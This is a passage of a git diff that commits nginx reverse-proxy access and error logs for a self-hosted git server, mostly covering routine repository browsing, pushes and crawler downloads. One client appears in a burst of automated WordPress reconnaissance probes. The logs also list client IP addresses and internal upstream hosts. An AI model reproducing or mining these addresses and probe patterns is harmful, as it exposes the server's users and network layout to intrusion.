(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 121.139.173.148] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 121.139.173.148] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:55:04 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9359] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.92.1.85] [Length 9346] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9364] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:20:55:11 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 45.92.1.85] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[18/Feb/2026:21:17:06 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:21:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:21:17:06 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" diff --git a/npm/data/logs/proxy-host-4_error.log b/npm/data/logs/proxy-host-4_error.log index 56c7ef6..1f3aef7 100644 --- a/npm/data/logs/proxy-host-4_error.log +++ b/npm/data/logs/proxy-host-4_error.log @@ -360,3 +360,423 @@ 2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000010115 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" 2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000010116 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr" 2026/02/16 12:05:38 [warn] 877#877: *35968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000010117 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:36:39 [warn] 900#900: *40411 a client request body is buffered to a temporary file /tmp/nginx/body/9/01/0000011019, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000011020 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000011021 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000011022 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000011023 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000011024 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000011025 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000011026 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr" +2026/02/17 02:37:12 [warn] 900#900: *40416 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000011027 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" +2026/02/17 12:59:23 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/03/0000014038 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js.4cf15d9a.map HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js.4cf15d9a.map", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/assets/js/index.js?v=1.25.3" +2026/02/17 13:00:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/03/0000014039 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +2026/02/17 13:01:04 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/04/0000014040 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +2026/02/17 13:04:02 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/04/0000014041 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +2026/02/17 13:04:10 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/04/0000014042 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +2026/02/17 13:04:17 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000014043 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +2026/02/17 13:04:29 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000014044 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" +2026/02/17 13:04:59 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000014045 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +2026/02/17 13:07:30 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000014046 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +2026/02/17 13:08:45 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000014047 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" +2026/02/17 13:08:53 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000014048 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +2026/02/17 13:09:18 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000014049 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +2026/02/17 13:09:43 [warn] 917#917: *47223 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000014050 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:09:58 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000014051 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:10:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000014052 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:10:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000014053 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +2026/02/17 13:11:04 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000014054 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +2026/02/17 13:12:09 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000014055 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:13:08 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000014056 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:13:21 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000014057 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:15:13 [warn] 917#917: *48229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000014058 while reading upstream, client: 74.7.227.38, server: 